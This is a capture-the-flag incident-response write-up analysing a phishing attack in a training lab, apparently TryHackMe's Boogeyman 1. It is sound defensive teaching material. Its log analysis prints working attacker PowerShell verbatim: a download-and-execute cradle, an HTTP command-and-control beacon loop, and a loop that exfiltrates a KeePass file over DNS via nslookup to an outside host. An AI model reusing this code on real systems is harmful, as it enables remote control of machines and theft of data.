Boogeyman 1
A new threat actor emerges from the wild using the name Boogeyman. Are you afraid of the Boogeyman?
CONTEXT
Challenge Link: TryHackMe - BoogeyMan 1
I. Background
Julianne, a finance employee working for Quick Logistics LLC, received a follow-up email regarding an unpaid invoice from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation.

II. Tools and Artifacts
1. Exfiltration
$ impacket-smbserver jebidiah . -smb2support
ubuntu@tryhackme:~$ cd Desktop
ubuntu@tryhackme:~/Desktop$ zip -r artefacts.zip artefacts/*
[..omitted..]
ubuntu@tryhackme:~/Desktop$ smbclient //10.8.81.251/jebidiah -c 'put artefacts.zip' -N
putting file artefacts.zip as \artefacts.zip (2551.7 kb/s) (average 2551.7 kb/s)
$ unzip artefacts.zip
$ ls artefacts
capture.pcapng dump.eml evtx2json powershell.evtx powershell.json
2. PowerShell Events
$ cat powershell.json | jq -r '.EventID' | sort | uniq -c | sort -bnr
939 4104
44 4100
2 53504
1 40962
1 40961
3. Protocol Heirarchy
$ tshark -r capture.pcapng | sed -e 's/^[ ]*\w*\s*//g' | sed -E 's/\s{2,}/ /g' | cut -d' ' -f5 | sort | uniq -c | sort -bnr
38769 TCP
3422 TLSv1.3
2060 QUIC
1989 HTTP
1229 DNS
1084 TLSv1.2
82 SSDP
77 TLSv1
74 ARP
14 UDP
12 NBNS
10 MDNS
7 HTTP/XML
5 SSLv2
5 IGMPv3
5 ICMPv6
5 ICMP
5 BROWSER
2 LLMNR
2 DHCP
ANALYSIS
I. Email Analysis
The security team was able to flag the suspicious execution of the attachment, in addition to the phishing reports received from the other finance department employees, making it seem to be a targeted attack on the finance team. Upon checking the latest trends, the initial TTP used for the malicious attachment is attributed to the new threat group named Boogeyman, known for targeting the logistics sector.
1. Exchange Information
Looking at the following information, an email was sent by Arthur Griffin ([email protected]
) to Julianne Westcott ([email protected]
):
From: Arthur Griffin <[email protected]>
Date: Fri, 13 Jan 2023 09:25:26 +0000
Subject: Collection for Quick Logistics LLC - Jan 2023
Message-Id: <[email protected]>
Reply-To: Arthur Griffin <[email protected]>
Sender: [email protected]
To: Julianne Westcott <[email protected]>
2. Security Headers
Both SPF and DMARC were marked as passed which shows that there is an unlikely event of email spoofing. The email also passed the DKIM check where two signatures were detected -- bpakcaging.xyz
and elasticemail.com
. The latter seems to be the MTA (Mail Transfer Agent) used by the attacker.
Authentication-Results: spf=pass (sender IP is 15.235.99.80)
smtp.mailfrom=bpakcaging.xyz; dkim=pass (signature was verified)
header.d=bpakcaging.xyz;dmarc=bestguesspass action=none
header.from=bpakcaging.xyz;compauth=pass reason=109
Received-SPF: Pass (protection.outlook.com: domain of bpakcaging.xyz
designates 15.235.99.80 as permitted sender) receiver=protection.outlook.com;
client-ip=15.235.99.80; helo=pa80.mxout.mta1.net; pr=C
DKIM-Signature: v=1; a=rsa-sha256; d=bpakcaging.xyz; s=api; c=relaxed/simple;
t=1673601926; h=from:date:subject:reply-to:to:list-unsubscribe:mime-version;
bh=DORzQK4K9VXO5g47mYpyX7cPagIyvAX1RLfbY0szvCc=;
b=dCB9MhhsZqg4h2P9dg5zMjLj7HVS9vt0fXuqEzH8cj6ft+YBJxvZHkF8uc+CeOas6CoICaPu13Q
oL/xVebg3aO8bmlooJWTAZx7mmrh/1ZQBVHm3wvGVI9Xn55nhWzRGoqVOAAPPM6+MEHFwZDIjKDAs
RpDurrnykQeCXCp127k=
DKIM-Signature: v=1; a=rsa-sha256; d=elasticemail.com; s=api;
c=relaxed/simple; t=1673601926;
h=from:date:subject:reply-to:to:list-unsubscribe;
bh=DORzQK4K9VXO5g47mYpyX7cPagIyvAX1RLfbY0szvCc=;
b=jcC3z+U5lVQUJEYRyQ76Z+xaJMrXN2YdjyM8pUl7hgXesQaY7rqSORNRWynpDQ3/CBSllw31eDq
WmoqpFqj2uVy5RXK73lkBEHs5ju1eH/4svHpZLS9+wU/tO5dfZVUImvY32iinpJCtoiMLjdpKYMA/
d5BBGqluALtqy9fZQzM=
3. Email Body
It states that there is an encrypted attachment that could be opened with the password, Invoice2023!
.
<html>
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dutf-8"></=
head>
<body style=3D"font-size: 13px; font-family: Helvetica;">
<br>
<p>Hi Julianne,</p>
<p>I hope you are well.</p>
<p>I just wanted to drop you a quick note to remind you in respect of docum=
ent #39586972 is due for payment on January 20, 2023.</p>
<p>I would be grateful if you could confirm everything is on track for paym=
ent.</p>
<p>For additional information, kindly see the attached document.<br><br>
You may use this code to view the encrypted file: <strong>Invoice2023!</str=
ong></p>
<p>Best regards,<br>
<strong>Arthur Griffin</strong><br>
Collections Officer<br>
B Packaging Inc.<br><br>
4. Email Attachment
A zip file, Invoice.zip
, was attached to the email.
--=-eZCfLFLerDWBDeKhYPAtYh7o4CYv5vMw7XWKyw==
Content-Type: application/zip
Content-Disposition: attachment; filename="Invoice.zip"; size=908;
Content-Transfer-Encoding: base64
UEsDBBQAAQAIAGiGLVZRFQDJ3gIAACgJAAAUAAAASW52b2ljZV8yMDIzMDEwMy5sbmvuhS6/jU+4
ClhWAZwY+LBcOUvw6oMIq5WNiZwjlKXvAj+pMMBFROiABqlJBxngGOoWUKX0yBXsXOhYPq3Z+Zls
vZX0xZqtZ/KWnX/QpZXzW44KZz1eqH+hnLgKXPTBsyTSqpqK9QUvYEsltPMSYnL0IqSNwX2TuL9l
oB0QB3owNKK2cltANxR5Nt3pdYwKJ4BqqI4x7D/ze4bWBT1jlR4HW8VEByEyLoc2fw3I0r0bc/8J
v9g1SZPBvshBg0pxI0/89GR2agMP+Lv6smkO/huUEOSRpidp/ft+prkt5v9sHFyS/Q0CTb9njCi2
terQ9NTeFAOkNAhGxWUPqPwPzB0cS+GBC2JY3LMqlA0K5aTejRodyVPcLlq2KVbyF7XljH2NZA4T
bFsDNJMFk2fQB1hfvmseP9FA20VAfwYvYW8GnBDdqhJtAwJ5xNvJgFFK/MTY2fChwTNN2zszqhzn
v1Sx+71+duA41HGR9K/jh4nEeRgPslOVlGtLwKBikbIpx/5ZaLpiZYwKS177jDoh3Qx+FRxsM6Ue
hjPSNgKmWHFZjReDWx8KD7qGLL9acO0hvZUuH83b70sAREDJbw+4sC2jcYO+hrHys6E4Dml030WQ
WhkKpvYv4DUw9nDmkGg4YgnyAv/iMbtImSUZQ/Wc6dEJM213hYefp8DTQZ321fZU5iCk86bAdxX2
3Ov40S9eX78X7CSp9b0QKNeC+N3JgMJ/gQrCWC73UfmHjT4mkBoP8A4YktR2LFNeistVP/zeMQPS
qUs8KaI7q+VTu/9buNeWkEW2maDm+bC0Q4AnJL+AocgZDPJ0RzfLWEpff3nbaYb6aPqhLTBfFURi
dszLIMEKmDLmiVqkWZJly9qV26NFttz5y4Q+fAATd6tMYRDlu/BFCo4+rdxjiKl0Gnn7UBHCq0gy
eEv/L8bppKI09XqNV3MJxMLBE3RN7E080hVp07qDpNpQTYEFa08gGy6yYFBLAQI/ABQAAQAIAGiG
LVZRFQDJ3gIAACgJAAAUACQAAAAAAAAAIAAAAAAAAABJbnZvaWNlXzIwMjMwMTAzLmxuawoAIAAA
AAAAAQAYAGiPRUBvJ9kBAAAAAAAAAAAAAAAAAAAAAFBLBQYAAAAAAQABAGYAAAAQAwAAAAA=
--=-eZCfLFLerDWBDeKhYPAtYh7o4CYv5vMw7XWKyw==--
Taking the attachment then extracting its contents using the given password, Invoice2023!
:
$ cat Invoice.zip_b64 | tr -d '\n' | base64 -d > Invoice.zip
$ file Invoice.zip
Invoice.zip: Zip archive data, at least v2.0 to extract, compression method=deflate
$ unzip Invoice.zip
Archive: Invoice.zip
[Invoice.zip] Invoice_20230103.lnk password: Invoice2023!
zsh: suspended unzip Invoice.zip
Examining the contents of Invoice_20230103.lnk
:
$ lnkparse Invoice_20230103.lnk
Windows Shortcut Information:
Link CLSID: 00021401-0000-0000-C000-000000000046
Link Flags: HasTargetIDList | HasName | HasRelativePath | HasWorkingDir | HasArguments | HasIconLocation | IsUnicode | HasExpIcon - (16637)
File Flags: - (0)
Creation Timestamp: None
Modified Timestamp: None
Accessed Timestamp: None
Icon Index: 0
Window Style: SW_SHOWMINNOACTIVE
HotKey: CONTROL - C {0x4302}
TARGETS:
Index: 78
ITEMS:
Root Folder
Sort index: My Computer
Guid: 20D04FE0-3AEA-1069-A2D8-08002B30309D
Volume Item
Flags: 0xf
Data: None
File entry
Flags: Is directory
Modification time: None
File attribute flags: 16
Primary name: Windows
File entry
Flags: Is directory
Modification time: None
File attribute flags: 16
Primary name: System32
File entry
Flags: Is directory
Modification time: None
File attribute flags: 16
Primary name: WindowsPowerShell
File entry
Flags: Is directory
Modification time: None
File attribute flags: 16
Primary name: v1.0
File entry
Flags: Is file
Modification time: None
File attribute flags: 0
Primary name: powershell.exe
DATA
Description: Invoice Jan 2023
Relative path: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Working directory: C:
Command line arguments: -nop -windowstyle hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA==
Icon location: C:\Users\Administrator\Desktop\excel.ico
EXTRA BLOCKS:
ICON_LOCATION_BLOCK
Target ansi: %USERPROFILE%\Desktop\excel.ico
Target unicode: %USERPROFILE%\Desktop\excel.ico
SPECIAL_FOLDER_LOCATION_BLOCK
Special folder id: 37
KNOWN_FOLDER_LOCATION_BLOCK
Known folder id: 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7
METADATA_PROPERTIES_BLOCK
Version: 0x53505331
Format id: 46588AE2-4CBC-4338-BBFC-139326986DCE
It executes an encoded PowerShell command which when decoded downloads a file, update
, and executes it in memory:
iex (new-object net.webclient).downloadstring('http://files.bpakcaging.xyz/update')
II. LOG ANALYSIS
Based on the initial findings, we discovered how the malicious attachment compromised Julianne's workstation:
A PowerShell command was executed.
Decoding the payload reveals the starting point of endpoint activities.
1. Timestamp Fix
The JSON included has mixed timestamps and to fix that:
$ cat powershell.json | jq -s -c 'sort_by(.Timestamp) | .[]' > powershell1.json
2. PowerShell Logs
Looking at the executions relevant to this case, the attacker was able to do the following:
$ cat powershell1.json | grep 4104 | jq '.ScriptBlockText' | grep -v Set-StrictMode
The initial execution of downloading update
from http://files.bpakcaging.xyz
:
iex (new-object net.webclient).downloadstring('http://files.bpakcaging.xyz/update')
Execute a C2 connection via HTTP Protocol Tunnelling to cdn.bpakcaging.xyz:8080
:
$s='cdn.bpakcaging.xyz:8080';$i='8cce49b0-b86459bb-27fe2489';$p='http://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{"X-38d2-8f49"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{"X-38d2-8f49"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{"X-38d2-8f49"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}\n
Which when expanded:
$s='cdn.bpakcaging.xyz:8080';
$i='8cce49b0-b86459bb-27fe2489';
$p='http://';
$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{"X-38d2-8f49"=$i};
while ($true){
$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{"X-38d2-8f49"=$i}).Content;
if ($c -ne 'None') {
$r=iex $c -ErrorAction Stop -ErrorVariable e;
$r=Out-String -InputObject $r;
$t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{"X-38d2-8f49"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')
} sleep 0.8
}
Upload and execute Seatbelt (host enumeration tool) to the workstation:
cd Users;pwd
cd j.westcott;pwd
ps;pwd
iex(new-object net.webclient).downloadstring('https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1');pwd
cd Public;pwd
cd Music;pwd
iwr http://files.bpakcaging.xyz/sb.exe -outfile sb.exe;pwd
.\\sb.exe all;pwd
.\\sb.exe system;pwd
.\\sb.exe;pwd
.\\sb.exe -group=all;pwd
Seatbelt.exe -group=user;pwd
.\\sb.exe -group=user;pwd
Locate a KeePass database -- C:\Users\j.westcott\Documents\protected_data.kdbx
ls C:\\Users\\j.westcott\\Documents\\protected_data.kdbx;pwd
Read an SQLite3 database from Microsoft Sticky Notes stored in the user's Local AppData folder:
C:\Users\j.westcottAppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite
cd ..\\AppData;pwd
ls Local;pwd
ls Local\\Packages;pwd
cd ..;pwd
ls AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe;pwd
ls AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState;pwd
iwr http://files.bpakcaging.xyz/sq3.exe -outfile sq3.exe;pwd
.\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\;pwd
.\\Music\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite "SELECT * from NOTE limit 100";pwd
Exfiltrate via DNS the contents of protected_data.kdbx
through nslookup
to 167.71.211.113
as a subdomain of bpakcaging.xyz
.
$file='protected_data.kdbx'; $destination = "167.71.211.113"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd
split-path $pwd'\\0x00';pwd
$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = "167.71.211.113"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd
$hex = ($bytes|ForEach-Object ToString X2) -join '';;pwd
$split = $hex -split '(\\S{50})'; ForEach ($line in $split) { nslookup -q=A "$line.bpakcaging.xyz" $destination;} echo "Done";;pwd
Which when cleaned up a bit:
$file='protected_data.kdbx';
$destination = "167.71.211.113";
$bytes = [System.IO.File]::ReadAllBytes($file);
split-path $pwd'\\0x00';
$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx';
$destination = "167.71.211.113";
$bytes = [System.IO.File]::ReadAllBytes($file);
$hex = ($bytes|ForEach-Object ToString X2) -join '';
$split = $hex -split '(\\S{50})';
ForEach ($line in $split) {
nslookup -q=A "$line.bpakcaging.xyz" $destination;
}
echo "Done";
III. Network Analysis
Based on the PowerShell logs investigation, we have seen the full impact of the attack:
The threat actor was able to read and exfiltrate two potentially sensitive files.
The domains and ports used for the network activity were discovered, including the tool used by the threat actor for exfiltration.
1. HTTP Traffic
Looking at the servers associated with the domain, bpakcaging.xyz
:
$ tshark -r capture.pcapng -Y 'http.response_for.uri contains "bpakcaging.xyz" and http' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.(server)")) then ({key: "server", value: .value}) else empty end) | .server' | sort | uniq -c | sort -nr
929 Apache/2.4.1
3 SimpleHTTP/0.6 Python/3.10.7
an Apache and Python one were identified. The latter, given the count, could be associated with the file server where the executables found during the log analysis were downloaded from:
$ tshark -r capture.pcapng -Y 'http.server contains "Python" and http' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.(res.*uri)")) then ({key: "uri", value: .value}) else empty end) | .uri'
http://files.bpakcaging.xyz/update
http://files.bpakcaging.xyz/sb.exe
http://files.bpakcaging.xyz/sq3.exe
All requests to the Apache server could be traced to http://cdn.bpakcaging.xyz:8080
:
$ tshark -r capture.pcapng -Y 'http.server contains "Apache" and http' -T json | jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.(res.*uri)")) then ({key: "uri", value: .value}) else empty end) | .uri' | sort | uniq -c | sort -nr
886 http://cdn.bpakcaging.xyz:8080/b86459bb
42 http://cdn.bpakcaging.xyz:8080/27fe2489
1 http://cdn.bpakcaging.xyz:8080/8cce49b0
To add, all requests made to /27fe2489
were found to be POST:
$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489" and http' -T json | jq -r '.[]."_source".layers.http' | grep request.method | sed -E 's/.*".*": "(.*)",/\1/g' | sort | uniq -c | sort -nr
42 POST
2. Command Executions
Looking at the POST data of a sample packet, it contains what seems to be decimal values:
$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489" and http' -T json| jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.file_data")) then ({key: "data", value: .value}) else empty end) | .data' | head -n1
13 13 10 13 10 80 97 116 104 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 45 45 45 45 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 13 10 67 58 92 87 105 110 100 111 119 115 92 115 121 115 116 101 109 51 50 13 10 13 10 13 10
Now, converting the data of all POST requests from decimal to ASCII:
$ tshark -r capture.pcapng -Y 'http.request.full_uri contains "/27fe2489" and http' -T json| jq -r '.[]."_source".layers.http | with_entries(if (.key|test("http.file_data")) then ({key: "data", value: .value}) else empty end) | .data' > c2.data
$ for i in $(cat c2.data); do for x in $i; do hex=$(printf '%x' $x); echo -ne "\x$hex"; done; done
It shows that a KeePass database was indeed found from the workstation:
Directory: C:\Users\j.westcott\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/13/2023 4:38 PM 2206 protected_data.kdbx
As well as its master password stored in Microsoft Sticky Notes:
Directory: C:\Users\j.westcott\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/13/2023 4:38 PM DiagOutputDir
-a---- 1/13/2023 4:30 PM 1014 Ecs.dat
-a---- 1/13/2023 4:30 PM 4096 plum.sqlite
-a---- 1/13/2023 4:38 PM 32768 plum.sqlite-shm
-a---- 1/13/2023 5:08 PM 168952 plum.sqlite-wal
Where the password is -- %p9^3!lL^Mz47E2GaT^y
:
\id=868150bd-a564-423b-9256-70d3781794b1 Master Password
\id=ad8b52f0-e1bb-40f6-bbf9-47a53f9180ab %p9^3!lL^Mz47E2GaT^y|ManagedPosition=DeviceId:\\?\DISPLAY#Default_Monitor#1&31c5ecd4&0&UID256#{e6f07b5f-ee97-4a90-b076-33f57bf4eaa7};Position=1106,43;Size=320,320|1|0||Yellow|0||||||0||8ca22c0e-ba5e-499a-a86c-7473a53dc6de|74f08724-ccc9-4ce6-94e7-8c99e6cd42c6|638092247397199589||638092247516107079
3. DNS Exfiltration
Based on the decoded POST data, the attempt for exfiltration was indeed as a subdomain of bpakcaging.xyz
:
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 38943F8ED485C92DA84BCCE2E2082000C47157BAF0E6A7EF35.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for A00731B6CE6192813F7AC951F0C6460D89A27D91DE15C50920.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 007187B84DD4E121AED3668F75F3761E8AAC3169F81025A5AE.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for 30D657448F4401890A0400020000000004000D0A0D0A3865AE.bpakcaging.xyz
*** UnKnown can't find .bpakcaging.xyz: Unspecified error
*** No address (A) records available for FAA72AA7E2FC9869F30F566E4F58A19582BDA4C0988D8E9F6C.bpakcaging.xyz
[..omitted..]
Looking at the packet capture, the chunked exfiltrated could also be seen:
$ tshark -r capture.pcapng -Y "dns" -T fields -e dns.qry.name | grep -E '[A-F0-9]+.bpakcaging.xyz$' | head -n 10
03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
03D9A29A67FB4BB50100030002100031C1F2E6BF714350BE58.bpakcaging.xyz
05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
05216AFC5AFF03040001000000042000AF4DE7A467FADFBFEB.bpakcaging.xyz
EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
EB78AE194B03926333E0CC968727A1FF8CC4CD5151FAAC0520.bpakcaging.xyz
00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
00516334C81F95A871AE6F5C6BB97075B74C6016ADAD4C35B3.bpakcaging.xyz
A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz
A327BFF48B837B4806080060EA0000000000000710000F22FE.bpakcaging.xyz
Cleaning the chunked data and putting it together retrieves the KeePass database file:
$ tshark -r capture.pcapng -Y "ip.dst==167.71.211.113 and dns" -T fields -e dns.qry.name | grep -E '[A-F0-9]+.bpakcaging.xyz$' | cut -d'.' -f1 | tr -d '\n' | xxd -p -r > protected_data.kdbx
$ file protected_data.kdbx
protected_data.kdbx: Keepass password database 2.x KDBX
Finally, opening the KeePass database using the password, %p9^3!lL^Mz47E2GaT^y
, reveals information of a company card with an account number, 4024007128269551
:
$ kpcli --kdb=protected_data.kdbx
Provide the master password: *************************
kpcli:/> dir
=== Groups ===
protected_data/
kpcli:/> cd protected_data
kpcli:/protected_data> dir
=== Groups ===
eMail/
General/
Homebanking/
Internet/
Network/
Recycle Bin/
Windows/
kpcli:/protected_data> cd Homebanking
kpcli:/protected_data/Homebanking> dir
=== Entries ===
0. Company Card
kpcli:/protected_data/Homebanking> show 0
Title: Company Card
Uname:
Pass:
URL:
Notes:
String Values:
1) Account Number = 4024007128269551
2) CVV = 970
3) Expiration Date = 3/2028
4) Name = Quick Logistics LLC
Last updated